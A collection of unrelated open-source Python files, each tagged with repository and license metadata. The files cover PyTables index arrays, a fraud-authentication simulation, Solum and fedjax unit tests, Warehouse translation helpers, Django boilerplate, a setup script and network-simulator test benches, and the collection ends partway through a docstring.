| ztane/zsos | userland/lib/python2.5/ctypes/test/test_slicing.py | Python | gpl-3.0 | 3,845 | 0.00156 |
"""Here is defined the IndexArray class."""
from bisect import bisect_left, bisect_right
from .node import NotLoggedMixin
from .carray import CArray
from .earray import EArray
from . import indexesextension
# Declarations for inheriting
class CacheArray(indexesextension.CacheArray, NotLoggedMixin, EArray):
"""Container for keeping index caches of 1st and 2nd level."""
# Class identifier.
_c_classid = 'CACHEARRAY'
class LastRowArray(indexesextension.LastRowArray, NotLoggedMixin, CArray):
"""Container for keeping sorted and indices values of last row of an
index."""
# Class identifier.
_c_classid = 'LASTROWARRAY'
class IndexArray(indexesextension.IndexArray, NotLoggedMixin, EArray):
"""Represent the index (sorted or reverse index) dataset in HDF5 file.
All NumPy typecodes are supported except for complex datatypes.
Parameters
----------
parentnode
The Index class from which this object will hang off.
.. versionchanged:: 3.0
Renamed from *parentNode* to *parentnode*.
name : str
The name of this node in its parent group.
atom
An Atom object representing the shape and type of the atomic objects to
be saved. Only scalar atoms are supported.
title
Sets a TITLE attribute on the array entity.
filters : Filters
An instance of the Filters class that provides information about the
desired I/O filters to be applied during the life of this object.
byteorder
        The byteorder of the data on-disk.
"""
# Class identifier.
_c_classid = 'INDEXARRAY'
@property
def chunksize(self):
"""The chunksize for this object."""
return self.chunkshape[1]
@property
def slicesize(self):
"""The slicesize for this object."""
return self.shape[1]
def __init__(self, parentnode, name,
atom=None, title="",
filters=None, byteorder=None):
"""Create an IndexArray instance."""
self._v_pathname = parentnode._g_join(name)
if atom is not None:
# The shape and chunkshape needs to be fixed here
if name == "sorted":
reduction = parentnode.reduction
shape = (0, parentnode.slicesize // reduction)
chunkshape = (1, parentnode.chunksize // reduction)
else:
shape = (0, parentnode.slicesize)
chunkshape = (1, parentnode.chunksize)
else:
# The shape and chunkshape will be read from disk later on
shape = None
chunkshape = None
super().__init__(
parentnode, name, atom, shape, title, filters,
chunkshape=chunkshape, byteorder=byteorder)
# This version of searchBin uses both ranges (1st level) and
# bounds (2nd level) caches. It uses a cache for boundary rows,
# but not for 'sorted' rows (this is only supported for the
# 'optimized' types).
def _search_bin(self, nrow, item):
item1, item2 = item
result1 = -1
result2 = -1
hi = self.shape[1]
ranges = self._v_parent.rvcache
boundscache = self.boundscache
# First, look at the beginning of the slice
begin = ranges[nrow, 0]
# Look for items at the beginning of sorted slices
if item1 <= begin:
result1 = 0
if item2 < begin:
result2 = 0
if result1 >= 0 and result2 >= 0:
return (result1, result2)
# Then, look for items at the end of the sorted slice
end = ranges[nrow, 1]
if result1 < 0:
if item1 > end:
result1 = hi
if result2 < 0:
if item2 >= end:
result2 = hi
if result1 >= 0 and result2 >= 0:
return (result1, result2)
# Finally, do a lookup for item1 and item2 if they were not found
# Lookup in the middle of slice for item1
chunksize = self.chunksize # Number of elements/chunksize
nchunk = -1
# Try to get the bounds row from the LRU cache
nslot = boundscache.getslot(nrow)
if nslot >= 0:
# Cache hit. Use the row kept there.
bounds = boundscache.getitem(nslot)
else:
# No luck with cached data. Read the row and put it in the cache.
bounds = self._v_parent.bounds[nrow]
size = bounds.size * bounds.itemsize
boundscache.setitem(nrow, bounds, size)
if result1 < 0:
# Search the appropriate chunk in bounds cache
nchunk = bisect_left(bounds, item1)
chunk = self._read_sorted_slice(nrow, chunksize * nchunk,
chunksize * (nchunk + 1))
result1 = indexesextension._bisect_left(chunk, item1, chunksize)
result1 += chunksize * nchunk
# Lookup in the middle of slice for item2
if result2 < 0:
# Search the appropriate chunk in bounds cache
nchunk2 = bisect_right(bounds, item2)
if nchunk2 != nchunk:
chunk = self._read_sorted_slice(nrow, chunksize * nchunk2,
chunksize * (nchunk2 + 1))
result2 = indexesextension._bisect_right(chunk, item2, chunksize)
result2 += chunksize * nchunk2
return (result1, result2)
def __str__(self):
"""A compact representation of this class"""
return f"IndexArray(path={self._v_pathname})"
def __repr__(self):
"""A verbose representation of this class."""
return f"""{self}
atom = {self.atom!r}
shape = {self.shape}
nrows = {self.nrows}
chunksize = {self.chunksize}
slicesize = {self.slicesize}
byteorder = {self.byteorder!r}"""
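# Rough pure-Python sketch of the range lookup performed by _search_bin above
# (illustrative only -- the real method works chunk-wise on cached on-disk data):
#
#   from bisect import bisect_left, bisect_right
#
#   def search_sorted_slice(sorted_slice, item1, item2):
#       # bounds of all values v with item1 <= v <= item2
#       return bisect_left(sorted_slice, item1), bisect_right(sorted_slice, item2)
#
# _search_bin first checks the per-slice minimum/maximum ("ranges") and the
# per-chunk boundaries ("bounds"), so at most one chunk per lookup has to be
# read from disk and bisected.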
| avalentino/PyTables | tables/indexes.py | Python | bsd-3-clause | 5,884 | 0 |
from authenticators.simple_authenticators import RandomAuthenticator, \
HeuristicAuthenticator, OracleAuthenticator, NeverSecondAuthenticator, \
AlwaysSecondAuthenticator
from simulator import parameters
from simulator.transaction_model import TransactionModel
from experiments import rewards
import numpy as np
import matplotlib.pyplot as plt
from experiments import result_handling
def run_single():
# get the parameters for the simulation
params = parameters.get_default_parameters()
params['init_satisfaction'] = 0.9
# increase the probability of making another transaction
new_stay_prob = [0.8, 0.5]
print('changing stay prob from', params['stay_prob'], 'to', new_stay_prob)
params['stay_prob'] = new_stay_prob
plt.figure(figsize=(10, 5))
for a in ['random', 'oracle', 'never_second', 'heuristic', 'always_second']:
# the authenticator
authenticator = get_authenticator(a)
# initialise transaction model
model = TransactionModel(params, authenticator)
# run the simulation until termination
while not model.terminated:
model.step()
# get the collected data
agent_vars = model.log_collector.get_agent_vars_dataframe()
agent_vars.index = agent_vars.index.droplevel(1)
model_vars = model.log_collector.get_model_vars_dataframe()
# save the results
result_handling.save_results(model)
reward_fraud = rewards.money_lost_per_timestep(agent_vars)
reward_genuine = rewards.money_made_per_timestep(agent_vars)
monetary_rewards = rewards.monetary_reward_per_timestep(agent_vars)
true_satisfactions = rewards.satisfaction_per_timestep(model_vars)
# plt.subplot(1, 4, 1)
plt.ylabel('revenue (total)')
plt.plot(range(len(monetary_rewards)), np.cumsum(monetary_rewards), label=a)
plt.legend()
# plt.subplot(1, 4, 2)
# plt.ylabel('cumulative satisfaction')
# plt.plot(range(len(true_satisfactions)), np.cumsum(true_satisfactions), label=a)
#
# plt.subplot(1, 4, 3)
# plt.ylabel('revenue (money lost by fraud)')
# plt.plot(range(len(true_satisfactions)), np.cumsum(true_satisfactions), label=a)
#
# plt.subplot(1, 4, 4)
# plt.ylabel('revenue (money gained by genuine transactions)')
# plt.plot(range(len(true_satisfactions)), np.cumsum(true_satisfactions), label=a)
plt.tight_layout()
plt.show()
def get_authenticator(auth_type):
if auth_type == 'random':
return RandomAuthenticator()
elif auth_type == 'heuristic':
return HeuristicAuthenticator(50)
elif auth_type == 'oracle':
return OracleAuthenticator()
elif auth_type == 'never_second':
return NeverSecondAuthenticator()
elif auth_type == 'always_second':
return AlwaysSecondAuthenticator()
if __name__ == '__main__':
run_single()
| lmzintgraf/MultiMAuS | experiments/run_multimaus.py | Python | mit | 2,970 | 0.001684 |
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from solum.api import auth
from solum.api.handlers import workflow_handler
from solum.openstack.common.fixture import config
from solum.tests import base
from solum.tests import fakes
from solum.tests import utils
@mock.patch('solum.objects.registry')
class TestWorkflowHandler(base.BaseTestCase):
def setUp(self):
super(TestWorkflowHandler, self).setUp()
self.ctx = utils.dummy_context()
self.CONF = self.useFixture(config.Config())
self.CONF.config(auth_uri='http://fakeidentity.com',
group=auth.OPT_GROUP_NAME)
self.CONF.config(keystone_version='3')
def test_workflow_get(self, mock_registry):
mock_registry.return_value.Workflow.get_by_uuid.return_value = {
'app_id': '1234'
}
handler = workflow_handler.WorkflowHandler(self.ctx)
res = handler.get('test_id')
self.assertIsNotNone(res)
get_by_uuid = mock_registry.Workflow.get_by_uuid
get_by_uuid.assert_called_once_with(self.ctx, 'test_id')
def test_workflow_get_all(self, mock_reg):
mock_reg.WorkflowList.get_all.return_value = {}
handler = workflow_handler.WorkflowHandler(self.ctx)
res = handler.get_all(app_id='123')
self.assertIsNotNone(res)
mock_reg.WorkflowList.get_all.assert_called_once_with(self.ctx,
app_id='123')
def test_delete(self, mock_registry):
db_obj = fakes.FakeWorkflow()
mock_registry.Workflow.get_by_uuid.return_value = db_obj
handler = workflow_handler.WorkflowHandler(self.ctx)
handler.delete('test_id')
mock_registry.Workflow.get_by_uuid.assert_called_once_with(self.ctx,
'test_id')
@mock.patch('solum.worker.api.API.build_app')
@mock.patch('solum.objects.sqlalchemy.workflow.Workflow.insert')
def test_create(self, mock_wf_insert, mock_pa, mock_registry):
app_obj = fakes.FakeApp()
app_id = app_obj.id
test_cmd = app_obj.workflow_config['test_cmd']
run_cmd = app_obj.workflow_config['run_cmd']
mock_registry.App.get_by_id.return_value = app_obj
        workflow_data = {"app_id": app_id,
                         "source": app_obj.source,
                         "config": app_obj.workflow_config,
                         "actions": app_obj.trigger_actions}
fp = fakes.FakePlan()
mock_registry.Plan.return_value = fp
fa = fakes.FakeAssembly()
fa.plan_uuid = fp.uuid
mock_registry.Assembly.return_value = fa
wf_obj = fakes.FakeWorkflow()
wf_obj.app_id = app_obj.id
wf_obj.assembly = fa.id
mock_registry.Workflow.return_value = wf_obj
fi = fakes.FakeImage()
mock_registry.Image.return_value = fi
handler = workflow_handler.WorkflowHandler(self.ctx)
res = handler.create(workflow_data, commit_sha='', status_url='',
du_id='')
self.assertEqual(wf_obj, res)
git_info = {
'source_url': app_obj.source['repository'],
'commit_sha': app_obj.source['revision'],
'repo_token': '',
'status_url': None,
}
mock_pa.assert_called_once_with(
verb='launch_workflow', workflow=['unittest', 'build', 'deploy'],
build_id=fa.id, name=fi.name, assembly_id=fa.id,
git_info=git_info, test_cmd=test_cmd, ports=app_obj.ports,
base_image_id=fi.base_image_id,
source_format=fi.source_format,
image_format=fi.image_format, run_cmd=run_cmd, du_id='') | devdattakulkarni/test-solum | solum/tests/api/handlers/test_workflow.py | Python | apache-2.0 | 4,365 | 0.000229 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for fedjax."""
import unittest
import fedjax
class FedjaxTest(unittest.TestCase):
"""Test fedjax can be imported correctly."""
def test_import(self):
self.assertTrue(hasattr(fedjax, 'FederatedAlgorithm'))
self.assertTrue(hasattr(fedjax.aggregators, 'Aggregator'))
self.assertTrue(hasattr(fedjax.algorithms, 'fed_avg'))
self.assertTrue(hasattr(fedjax.datasets, 'emnist'))
self.assertTrue(hasattr(fedjax.models, 'emnist'))
self.assertTrue(hasattr(fedjax.training, 'save_checkpoint'))
def test_no_core(self):
self.assertFalse(hasattr(fedjax, 'core'))
if __name__ == '__main__':
unittest.main()
| google/fedjax | fedjax/fedjax_test.py | Python | apache-2.0 | 1,219 | 0.003281 |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import functools
from jinja2 import contextfunction
from pyramid.threadlocal import get_current_request
class TranslationString:
def __init__(self, message_id, plural=None, n=None, mapping=None):
if mapping is None:
mapping = {}
self.message_id = message_id
self.plural = plural
self.n = n
self.mapping = mapping
if bool(self.plural) != bool(self.n):
raise ValueError("Must specify plural and n together.")
def __repr__(self):
extra = ""
if self.plural is not None:
extra = " plural={!r} n={!r}".format(self.plural, self.n)
return "<TranslationString: message_id={!r}{}>".format(
self.message_id,
extra,
)
def __mod__(self, mapping):
if not isinstance(mapping, collections.abc.Mapping):
raise TypeError("Only mappings are supported.")
vals = self.mapping.copy()
vals.update(mapping)
return TranslationString(
self.message_id, self.plural, self.n, mapping=vals,
)
def translate(self, translation):
if self.plural is not None:
result = translation.ngettext(self.message_id, self.plural, self.n)
else:
result = translation.gettext(self.message_id)
return result % self.mapping
class JinjaRequestTranslation:
def __init__(self, domain):
self.domain = domain
@contextfunction
def gettext(self, ctx, *args, **kwargs):
request = ctx.get("request") or get_current_request()
return request.translation.gettext(*args, **kwargs)
@contextfunction
def ngettext(self, ctx, *args, **kwargs):
request = ctx.get("request") or get_current_request()
return request.translation.ngettext(*args, **kwargs)
@contextfunction
def translate_value(ctx, value):
if isinstance(value, TranslationString):
return value.translate(ctx["request"].translation)
return value
def gettext(message_id, **kwargs):
return TranslationString(message_id, mapping=kwargs)
def ngettext(message_id, plural, n=None, **kwargs):
if n is None:
return functools.partial(
TranslationString, message_id, plural, mapping=kwargs
)
return TranslationString(message_id, plural, n, mapping=kwargs)
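# Usage sketch (illustrative; ``translation`` stands for any gettext-style
# translations object exposing gettext()/ngettext()):
#
#   ts = ngettext("%(count)s project", "%(count)s projects", 3, count=3)
#   ts.translate(translation)        # -> "3 projects" in the default locale
#
#   greeting = gettext("Hello %(user)s", user="guest")
#   greeting % {"user": "admin"}     # new TranslationString with an updated mapping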
| chopmann/warehouse | warehouse/i18n/translations.py | Python | apache-2.0 | 2,912 | 0 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cvirtual.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| Serchcode/cvirtual | manage.py | Python | gpl-3.0 | 806 | 0 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-15 16:12
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=2000, verbose_name='Имя студента')),
('rating', models.IntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100), django.core.validators.MinValueValidator(0)], verbose_name='Рейтинг')),
],
),
]
| Alt90/Student_progress_bar | achievement/migrations/0001_initial.py | Python | mit | 819 | 0.003745 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from setuptools import setup
from fairu import __version__
def packages():
packages = []
for root, dirnames, filenames in os.walk('fairu'):
if '__init__.py' in filenames:
packages.append(".".join(os.path.split(root)).strip("."))
return packages
def description():
return open('README.md', 'r').read()
def requirements():
lines = open('REQUIREMENTS', 'r').readlines()
requirements = []
for line in lines:
requirements.append(line.replace('\n', ''))
return requirements
def entry_points():
ENTRY_POINTS = {}
try:
from setuptools import Command
except ImportError:
sys.stderr.write("setuptools.Command could not be imported: setuptools "
"extensions not available")
else:
command_hook = "distutils.commands"
ENTRY_POINTS[command_hook] = []
from commands import coverage_analysis
if coverage_analysis.COVERAGE_ANALYSIS_AVAILABLE:
ENTRY_POINTS[command_hook].append("test = commands.coverage_ana"
"lysis:CoverageAnalysis")
return ENTRY_POINTS
def get_setup_config():
    from ConfigParser import ConfigParser
    config = ConfigParser()
    config.read('setup.cfg')
    return config
if __name__ == '__main__':
setup(name = 'fairu',
version = __version__,
description = "Fairu is a python library to handle files easily "
"using a chain pattern like the jQuery framework.",
author = 'Diego Fleury',
author_email = 'dfleury@gmail.com',
license = 'GPL',
keywords = "files batch process handling",
url = 'http://github.com/dfleury/fairu',
packages = packages(),
long_description = description(),
entry_points = entry_points(),
classifiers = ["Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers"
"License :: OSI Approved :: GNU General Public "
"License (GPL)"
"Programming Language :: Python :: 2",
"Topic :: Software Development :: Libraries :: "
"Python Modules"],
install_requires = requirements()
) | dfleury/fairu | setup.py | Python | gpl-3.0 | 2,511 | 0.018319 |
from seabreeze.pyseabreeze.features._base import SeaBreezeFeature
# Definition
# ==========
#
# TODO: This feature needs to be implemented for pyseabreeze
#
class SeaBreezeDataBufferFeature(SeaBreezeFeature):
identifier = "data_buffer"
def clear(self) -> None:
raise NotImplementedError("implement in derived class")
def remove_oldest_spectra(self, number_of_spectra: int) -> None:
raise NotImplementedError("implement in derived class")
def get_number_of_elements(self) -> int:
raise NotImplementedError("implement in derived class")
def get_buffer_capacity(self) -> int:
raise NotImplementedError("implement in derived class")
def set_buffer_capacity(self, capacity: int) -> None:
raise NotImplementedError("implement in derived class")
def get_buffer_capacity_maximum(self) -> int:
raise NotImplementedError("implement in derived class")
def get_buffer_capacity_minimum(self) -> int:
raise NotImplementedError("implement in derived class")
| ap--/python-seabreeze | src/seabreeze/pyseabreeze/features/databuffer.py | Python | mit | 1,040 | 0 |
# Working Unit Test Benches for Network Simulator
# Last Revised: 14 November 2015 by Sushant Sundaresh & Sith Domrongkitchaiporn
'''
IMPORTANT: Please turn off logging (MEASUREMENT_ENABLE = False) in constants.py
before running these testbenches.
'''
# Unit Testing Framework
import unittest
# Test Modules
import reporter, node, host, link, router
import flow, event_simulator, event, events
import link, link_buffer, packet
import constants
from static_flow_test_node import *
import visualize
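# The docstring above asks for MEASUREMENT_ENABLE = False in constants.py before
# running. The layout of constants.py is not shown here, so this guard is only an
# assumption-level sketch; it simply fails fast if the flag is still enabled.
if getattr(constants, 'MEASUREMENT_ENABLE', False):
    raise RuntimeError("Set MEASUREMENT_ENABLE = False in constants.py "
                       "before running these testbenches.")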
class testMeasurementAnalysis (unittest.TestCase):
'''
Tests visualize.py time-averaging function
'''
def test_time_averaging (self):
self.assertTrue(visualize.test_windowed_time_average())
class TestStaticDataSinkFlow (unittest.TestCase):
'''
### Might break for dynamic TCP ###
if this is implemented on receiver side as well
Create Flow Data Sink
Create Static_Data_Sink_Test_Node
Tell Flow its number or expected packets
Create Event Simulator
For now:
Ask flow to receive a packet, check that Ack has same packet ID
Ask flow to receive the same packet again, should get same result.
'''
sim = "" # event simulator
f = "" # flow, data source, static
n = "" # test node
def setUp (self):
self.f = flow.Data_Sink("f1sink","h2","h1",\
3*constants.DATA_PACKET_BITWIDTH, 1.0)
self.n = Static_Data_Sink_Test_Node ("h2","f1sink")
self.sim = event_simulator.Event_Simulator({"f1sink":self.f,"h2":self.n})
self.f.set_flow_size(2)
def test_basic_ack (self):
packets = [ packet.Packet("f1source","h1","h2","",0,0), \
packet.Packet("f1source","h1","h2","",1,0)]
self.n.receive(packets[0])
self.assertEqual(self.n.head_of_tx_buff(),0)
self.n.receive(packets[1])
self.assertEqual(self.n.head_of_tx_buff(),1)
# Two packets received, two packets acknowledged
with self.assertRaises(ValueError):
self.n.head_of_tx_buff()
# Repeated packets just get repeated acks
self.n.receive(packets[1])
self.assertEqual(self.n.head_of_tx_buff(),1)
class TestStaticDataSourceFlow (unittest.TestCase):
'''
### Will break for dynamic TCP ###
Assumes Flow (Data Source) Window Size
hard-coded to 2
Create Flow Data Source
Create Static_Data_Source_Test_Node
Create Event Simulator
Start Flow -> pokes tcp -> sends two packets to Node
Check that these were sent to Node
Fake Acks through Node to Flow
Check that this updates Node Tx_Buffer (more sends from Flow)
Check what Timeout Does
'''
sim = "" # event simulator
f = "" # flow, data source, static
n = "" # test node
def setUp (self):
self.f = flow.Data_Source("f1","h1","h2",\
3*constants.DATA_PACKET_BITWIDTH, 1.0)
self.n = Static_Data_Source_Test_Node ("h1","f1")
self.sim = event_simulator.Event_Simulator({"f1":self.f,"h1":self.n})
def test_static_flow_source (self):
# The first static flow source implementation
# just has packets/acks have the same id.
# There is no chance of 'duplicate acks' to indicate loss
self.f.start() # do this manually so don't have to run simulator
self.assertEqual(self.n.head_of_tx_buff(),0)
packet1 = self.n.tx_buff[0]
self.assertEqual(self.n.head_of_tx_buff(),1)
with self.assertRaises(ValueError):
self.n.head_of_tx_buff()
self.n.receive(packet.Packet("","h2","h1",\
constants.DATA_PACKET_ACKNOWLEDGEMENT_TYPE,\
0,constants.DATA_ACK_BITWIDTH))
self.assertEqual(self.n.head_of_tx_buff(),2)
with self.assertRaises(ValueError):
self.n.head_of_tx_buff()
self.f.time_out(packet1)
# check that next packet has id 1
self.assertEqual(self.n.head_of_tx_buff(),1)
class TestLinkTransmissionEvents(unittest.TestCase):
sim = "" # simulator
link = "" # link
lNode = "" # left node
rNode = "" # right node
lPs = [] # left packets
rPs = [] # right packets
# Create Event Simulator
# Create Link & Nodes (not Hosts, so don't need working Flow) on either side
# Create three packets from either side, to the other, and send them.
def setUp (self):
self.lNode = node.Node("h1")
self.rNode = node.Node("h2")
# don't need flow, as no packet timeouts created to callback to flow
# and node receive is a dummy function
for i in 1, 2, 3:
self.lPs.append(packet.Packet("","h1","h2","data",i,1000)) # 1000kbit
self.rPs.append(packet.Packet("","h2","h1","data",i,1000))
self.link = link.Link("l1", "h1", "h2", 1000.0, 10.0, 3000.0)
# 1000kbit/ms, 10 ms prop delay, 3000kbit buffers
self.sim = event_simulator.Event_Simulator({"l1":self.link, \
"h1":self.lNode, \
"h2":self.rNode})
# Order the packet sends 2L-2R-L-R
# Run Sim Forward
# Watch for transmission events in EventSimulator, with proper timestamp
# Watch for propagation events in EventSimulator, with proper timestamp
# Make sure these are sequential, with only one Tx event at a time in
# the queue, and two propagations in each direction chained, and one isolated.
# Note this tests most events we're trying to deal with.
def test_packet_callbacks_and_timing (self):
self.link.send(self.rPs.pop(0),"h2") # right going packets
# are favored in time tie breaks
self.link.send(self.rPs.pop(0),"h2")
self.link.send(self.rPs.pop(0),"h2")
self.link.send(self.lPs.pop(0),"h1")
# all have timestamp 0.0
# so link should switch directions
# between each packet
# Confirm Handle_Packet_Transmission events show up in EventSim
# with proper timestamps
self.assertTrue(self.sim.get_current_time() == 0)
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 1)
# right packet1 load
# into channel at
# 1ms going h2->h1
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 11)
# propagation done
# direction switched
# next packet loaded
# LTR
self.assertTrue(self.link.transmission_direction == constants.LTR)
# next event is a load (12)
# then a propagation (22)
# then
# the next event should be
# both remaining h2 packets
# loaded, as left buffer
# is empty
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 12)
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 22)
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.sim.run_next_event()
self.sim.run_next_event() # two loads
self.assertTrue(self.sim.get_current_time() == 24)
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.sim.run_next_event() # two propagations
self.sim.run_next_event()
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.assertTrue(self.sim.get_current_time() == 34)
class TestLinkBuffer(unittest.TestCase):
# test variables
l = "" # a link buffer
p = "" # a packet exactly half the size of the buffer
s = "" # event simulator
def setUp (self):
c = 100 # buffer capacity in bits
self.s = event_simulator.Event_Simulator({})
self.l = link_buffer.LinkBuffer(c)
self.l.set_event_simulator(self.s)
self.p = packet.Packet("","","","","",c/2)
def test_enqueue_dequeue (self):
self.assertTrue(self.l.can_enqueue(self.p))
self.l.enqueue(self.p)
self.assertTrue(self.l.can_enqueue(self.p))
self.l.enqueue(self.p)
self.assertFalse(self.l.can_enqueue(self.p))
self.l.enqueue(self.p) # dropped
self.l.enqueue(self.p) # dropped
self.assertTrue(self.l.can_dequeue())
self.assertTrue( isinstance(self.l.dequeue(),packet.Packet) )
self.assertTrue(self.l.can_dequeue())
self.assertTrue( isinstance(self.l.dequeue(),packet.Packet) )
self.assertFalse(self.l.can_dequeue())
with self.assertRaises(ValueError):
self.l.dequeue()
class TestReporter(unittest.TestCase):
# Set ID of reporter
def test_get_id(self):
ID = "H1"
r = reporter.Reporter(ID)
r.log("Hello World!")
self.assertEqual(r.get_id(), ID)
class TestNode(unittest.TestCase):
    # Set ID of node through super initialization
def test_init(self):
ID = "H2"
n = node.Node(ID)
n.log("Hello World!")
self.assertEqual(n.get_id(), ID)
# Should not break, as receive is a dummy function
def test_receive(self):
ID = "H2"
n = node.Node(ID)
n.receive(0)
class TestEventSimulator(unittest.TestCase):
def test_init_and_basic_simulation (self):
e = event_simulator.Event_Simulator({"h1":host.Host("h1",["l1"]),\
"h2":host.Host("h2",["l1"]),\
"f1":flow.Data_Source("f1", "h1", "h2", 20, 1)})
self.assertEqual(e.get_current_time(), 0.0)
self.assertFalse(e.are_flows_done())
self.assertEqual(e.get_element("h1").get_id(), "h1")
self.assertEqual(e.get_element("h2").get_id(), "h2")
self.assertEqual(e.get_element("f1").get_id(), "f1")
e.request_event(event.Event().set_completion_time(1.0))
e.request_event(event.Event().set_completion_time(2.0))
e.request_event(event.Event().set_completion_time(0.5))
e.request_event(event.Event().set_completion_time(1.5))
e.request_event(event.Event().set_completion_time(0.2))
''' Now event heap should be ordered 0.2, 0.5, 1, 1.5, 2 '''
e.run_next_event()
self.assertEqual(e.get_current_time(), 0.2)
e.run_next_event()
self.assertEqual(e.get_current_time(), 0.5)
e.run_next_event()
self.assertEqual(e.get_current_time(), 1.0)
e.run_next_event()
self.assertEqual(e.get_current_time(), 1.5)
e.run_next_event()
self.assertEqual(e.get_current_time(), 2.0)
class TestHost(unittest.TestCase):
    # Set ID of host through super initialization
def test_init(self):
ID = "H1"
Links = ["L1"]
h = host.Host(ID,Links)
h.log("Hello World!")
self.assertEqual(h.get_id(), ID)
with self.assertRaises(ValueError):
h2 = host.Host(ID,["L1","L2"])
class TestLink(unittest.TestCase):
ID = ""
left = ""
right = ""
rate = ""
delay = ""
buff = ""
l = ""
def setUp(self):
self.ID = "L1"
self.left = "H1"
self.right = "H2"
self.rate = "10"
self.delay = "10"
self.buff = "64"
self.l = link.Link(self.ID,self.left,self.right,self.rate,self.delay,self.buff)
    # Set ID of link through super initialization
def test_get_id(self):
self.assertEqual(self.l.get_id(), self.ID)
def test_get_left(self):
self.assertEqual(self.l.get_left(),self.left)
def test_get_right(self):
self.assertEqual(self.l.get_right(),self.right)
def test_get_rate(self):
self.assertEqual(self.l.get_rate(),float(self.rate))
def test_get_delay(self):
self.assertEqual(self.l.get_delay(),float(self.delay))
def test_get_buff(self):
self.assertEqual(self.l.get_buff(),float(self.buff) * 8.0) # bytes to bits
class TestRouter(unittest.TestCase):
    # Set ID of router through super initialization
def test_init(self):
ID = "R1"
links = ["H1","H2","H3"]
r = router.Router(ID,links)
self.assertEqual(r.get_id(), ID)
self.assertEqual(r.get_link(),links)
class TestFlow(unittest.TestCase):
    # Set ID of flow through super initialization
def test_init(self):
ID = "F1"
source = "H1"
dest = "H2"
size = "20"
start = "1"
f = flow.Flow(ID,source,dest,size,start)
self.assertEqual(f.get_id(), ID)
self.assertEqual(f.get_source(), source)
self.assertEqual(f.get_dest(), dest)
self.assertEqual(f.get_size(), int(size) * 8.0 * 1000.0) # MByte -> KBit
self.assertEqual(f.get_start(), int(start) * 1000) # s to ms
# Run Specific Tests
if __name__ == "__main__":
reporter_suite = unittest.TestLoader().loadTestsFromTestCase(TestReporter)
node_suite = unittest.TestLoader().loadTestsFromTestCase(TestNode)
host_suite = unittest.TestLoader().loadTestsFromTestCase(TestHost)
link_suite = unittest.TestLoader().loadTestsFromTestCase(TestLink)
router_suite = unittest.TestLoader().loadTestsFromTestCase(TestRouter)
flow_suite = unittest.TestLoader().loadTestsFromTestCase(TestFlow)
sim_suite = unittest.TestLoader().loadTestsFromTestCase(TestEventSimulator)
linkbuffer_suite = unittest.TestLoader().loadTestsFromTestCase(TestLinkBuffer)
link_tx_suite = unittest.TestLoader().loadTestsFromTestCase(TestLinkTransmissionEvents)
static_flow_data_source_suite = \
unittest.TestLoader().loadTestsFromTestCase(TestStaticDataSourceFlow)
static_flow_data_sink_suite = \
unittest.TestLoader().loadTestsFromTestCase(TestStaticDataSinkFlow)
visualize_suite = \
unittest.TestLoader().loadTestsFromTestCase(testMeasurementAnalysis)
test_suites = [reporter_suite, node_suite, host_suite, link_suite,\
router_suite, flow_suite, sim_suite, linkbuffer_suite,\
link_tx_suite,static_flow_data_source_suite,\
static_flow_data_sink_suite, visualize_suite]
for suite in test_suites:
unittest.TextTestRunner(verbosity=2).run(suite)
print "\n\n\n" | sssundar/NetworkSimulator | Code/Python/unit_test_benches.py | Python | gpl-2.0 | 12,927 | 0.044403 |
''' Example script to run a full analysis on telescope data. The original data
can be found in the example folder of the EUTelescope framework.
Data in https://github.com/eutelescope/eutelescope/tree/v1.0-tag/jobsub/examples/datura-150mm-DAF
The residuals are calculated with different cuts on prealigned and aligned data
for demonstration purpose:
- When only prealigning the DUTs and using all DUT hits and cutting on the chi2:
  The residuals depend strongly on whether the prealignment is sufficient. Residuals
are usually rather high (several 10 um)
- When aligning the DUTs and only interpolating the tracks from 2 DUTs:
  The residuals for planes 2 - 4 (DUT 1 - DUT 3) are about 6.5 um in x/y and
comparable to the residuals from the EuTelescope software (6 um).
- When aligning the DUTs and using all DUT hits and cutting on the chi2:
